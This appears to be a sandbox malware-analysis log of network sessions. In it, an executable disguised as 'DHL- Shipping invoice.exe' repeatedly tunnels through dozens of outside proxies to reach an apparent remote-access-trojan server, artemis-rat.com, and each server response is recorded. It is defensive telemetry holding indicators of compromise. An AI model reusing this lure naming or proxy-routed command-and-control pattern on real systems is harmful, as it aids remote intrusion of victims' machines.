                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1051192.168.2.453199142.54.226.21441456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.330032110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1052192.168.2.45321118.185.169.15031286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.332243919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.502801895 CET116INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Server: nginx
                            Content-Type: text/plain
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1053192.168.2.45320184.39.112.14431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.332402945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1054192.168.2.453296104.21.64.208806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.332417965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.420056105 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1055192.168.2.45326938.162.17.1331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.332633972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.651724100 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1056192.168.2.453051112.30.155.83127926484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.333617926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.847312927 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1057192.168.2.451100173.212.209.49184216484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.335112095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.359437943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.359719038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.360970974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1058192.168.2.453326104.20.198.49806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.335920095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.423142910 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1059192.168.2.453110123.126.158.50806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.336004019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1060192.168.2.45277593.171.220.22988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.379272938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1061192.168.2.453204194.31.79.75509206484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.385190964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.918023109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.640769005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953219891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453504086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.950994968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.429578066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1062192.168.2.451324162.241.46.40562416484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.385513067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.471738100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.640747070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.640944958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.640638113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:51.640506029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1063192.168.2.453202185.101.16.52806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.385637999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1064192.168.2.453271139.162.238.184210176484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.410315990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1065192.168.2.453288146.190.35.6380006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.415467978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1066192.168.2.45327581.19.141.20985066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.416507006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1067192.168.2.453152164.52.206.18806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.420877934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.766175032 CET532INHTTP/1.1 405 Method Not Allowed
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Server: Apache
                            Allow: OPTIONS,HEAD,GET,POST
                            Content-Length: 348
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 47 45 54 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1068192.168.2.45316720.24.43.214806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.420877934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.748584032 CET319INHTTP/1.1 403 Forbidden
                            Server: squid
                            Mime-Version: 1.0
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html;charset=utf-8
                            Content-Length: 17
                            X-Squid-Error: ERR_ACCESS_DENIED 0
                            X-Cache: MISS from cdn-fintech.info
                            X-Cache-Lookup: NONE from cdn-fintech.info:8123
                            Connection: keep-alive
                            Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                            Data Ascii: ERR_ACCESS_DENIED


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1069192.168.2.453129218.6.120.11177776484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.421133995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.997854948 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1070192.168.2.453160103.23.101.9741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.426532984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1071192.168.2.452738103.215.139.3274806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.428149939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.471771955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.640769005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1072192.168.2.453223172.67.187.242806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.434956074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.521852970 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:03 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1073192.168.2.451275162.214.103.84180886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.435185909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1074192.168.2.45327738.162.12.13731286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.435462952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.733685017 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1075192.168.2.451264142.4.7.20431006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.435463905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.471740007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.640779972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.640947104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.640731096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1076192.168.2.4532005.190.220.23531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.435679913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1077192.168.2.451291164.92.237.188523956484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.435683966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1078192.168.2.451361177.234.245.249322136484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:03.435739040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
